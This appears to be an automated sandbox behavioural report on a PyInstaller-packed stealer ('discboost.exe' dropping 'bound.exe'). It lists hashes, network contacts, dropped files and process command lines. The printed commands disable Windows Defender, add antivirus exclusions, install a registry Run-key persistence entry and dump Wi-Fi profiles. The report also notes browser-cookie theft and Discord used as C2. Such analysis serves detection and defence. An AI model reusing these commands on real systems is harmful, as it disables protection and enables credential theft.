US 8.8.8.8:53 www.cloudflare.com udp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 8.8.8.8:53 96.123.16.104.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
NL 20.103.156.88:443 fd.api.iris.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29562\python310.dll

MD5 178a0f45fde7db40c238f1340a0c0ec0
SHA1 dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe
SHA256 9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed
SHA512 4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

C:\Users\Admin\AppData\Local\Temp\_MEI29562\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/236-26-0x00007FFBAB8D0000-0x00007FFBABD3E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI29562\base_library.zip

MD5 5bf257cce4b4a29fa20ddc5bc6889973
SHA1 2c9a24a961b5c475a77a1460e48bdc2b0c3e79ad
SHA256 f55752b907702ff162760809519315c278b013f84ff8f4b001268b84fedd70ae
SHA512 2e188c87cca4c398c9144aa9330a6420f14c2b45c12f49dfe378240c51143f9f0c115dec307420f94bb1aad0f91b1775b8102e78899f13cf36f076626c9f3216

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_ctypes.pyd

MD5 813fc3981cae89a4f93bf7336d3dc5ef
SHA1 daff28bcd155a84e55d2603be07ca57e3934a0de
SHA256 4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06
SHA512 ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

C:\Users\Admin\AppData\Local\Temp\_MEI29562\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

memory/236-31-0x00007FFBBB760000-0x00007FFBBB784000-memory.dmp

memory/236-50-0x00007FFBC0E70000-0x00007FFBC0E7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_ssl.pyd

MD5 081c878324505d643a70efcc5a80a371
SHA1 8bef8336476d8b7c5c9ef71d7b7db4100de32348
SHA256 fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66
SHA512 c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_sqlite3.pyd

MD5 bb4aa2d11444900c549e201eb1a4cdd6
SHA1 ca3bb6fc64d66deaddd804038ea98002d254c50e
SHA256 f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f
SHA512 cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_socket.pyd

MD5 7a31bc84c0385590e5a01c4cbe3865c3
SHA1 77c4121abe6e134660575d9015308e4b76c69d7c
SHA256 5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36
SHA512 b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_queue.pyd

MD5 0e7612fc1a1fad5a829d4e25cfa87c4f
SHA1 3db2d6274ce3dbe3dbb00d799963df8c3046a1d6
SHA256 9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8
SHA512 52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_lzma.pyd

MD5 6f810f46f308f7c6ccddca45d8f50039
SHA1 6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea
SHA256 39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76
SHA512 c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

C:\Users\Admin\AppData\Local\Temp\_MEI29562\_hashlib.pyd

MD5 4ae75c47dbdebaa16a596f31b27abd9e
C:\Users\Admin\AppData\Local\Temp\_MEI29562\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI29562\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI29562\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI29562\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI29562\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI29562\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI29562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI29562\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI29562\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI29562\bound.blank
C:\Users\Admin\AppData\Local\Temp\_MEI29562\blank.aes
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e540z2ao.flj.ps1
C:\Users\Admin\AppData\Local\Temp\bound.exe
C:\Users\Admin\AppData\Local\Temp\_MEI43922\setuptools-65.5.0.dist-info\INSTALLER
C:\Users\Admin\AppData\Local\Temp\_MEI43922\python310.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43922\python3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43922\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43922\libffi-7.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43922\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43922\pyexpat.pyd
C:\Users\Admin\AppData\Local\Temp\downloads_db
C:\Users\Admin\AppData\Local\Temp\vault\cookies.txt
C:\Users\Admin\AppData\Local\Temp\_MEI43922\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43922\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43922\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43922\base_library.zip

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 21:53

Reported

2024-11-10 21:54

Platform

win11-20241007-fr

Max time kernel

12s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipapi.co N/A N/A
N/A ip-api.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4480 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Users\Admin\AppData\Local\Temp\discboost.exe
PID 3612 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\discboost.exe C:\Windows\System32\wbem\WMIC.exe
PID 480 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1524 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1144 wrote to memory of 3140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2808 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1560 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1684 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 232 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4444 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4776 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 232 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 232 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 4436 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3972 wrote to memory of 1144 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 232 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 232 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1104 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 232 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 232 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Users\Admin\AppData\Local\Temp\discboost.exe

"C:\Users\Admin\AppData\Local\Temp\discboost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discboost.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-jwlqx.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 162.159.137.232:443 discord.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 104.16.124.96:443 www.cloudflare.com tcp
US 104.26.8.44:443 ipapi.co tcp
US 162.159.137.232:443 discord.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI44802\python310.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\libffi-7.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\blank.aes

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI44802\rarreg.key

C:\Users\Admin\AppData\Local\Temp\_MEI44802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44802\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI44802\bound.blank

C:\Users\Admin\AppData\Local\Temp\bound.exe

C:\Users\Admin\AppData\Local\Temp\_MEI16842\python310.dll

C:\Users\Admin\AppData\Local\Temp\_MEI16842\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI16842\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI16842\libffi-7.dll

C:\Users\Admin\AppData\Local\Temp\_MEI16842\select.pyd

C:\Users\Admin\AppData\Local\Temp\downloads_db

C:\Users\Admin\AppData\Local\Temp\vault\cookies.txt

C:\Users\Admin\AppData\Local\Temp\downloads_db

C:\Users\Admin\AppData\Local\Temp\_MEI16842\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI16842\pyexpat.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI16842\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI16842\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI16842\python3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI16842\setuptools-65.5.0.dist-info\INSTALLER

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a2pvnjzg.5zx.ps1